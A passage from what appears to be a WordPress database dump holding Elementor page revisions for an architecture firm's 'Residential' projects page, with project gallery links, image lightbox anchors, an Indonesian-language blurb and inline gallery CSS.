e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:35:21','2023-09-22 08:35:21','',560,'https://bauhaus.futuremediatrix.com/?p=4850',0,'revision','',0),(4851,3,'2023-09-22 08:35:21','2023-09-22 08:35:21','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n							<p> Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:35:21','2023-09-22 08:35:21','',560,'https://bauhaus.futuremediatrix.com/?p=4851',0,'revision','',0),(4852,3,'2023-09-22 08:36:54','2023-09-22 08:36:54','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" 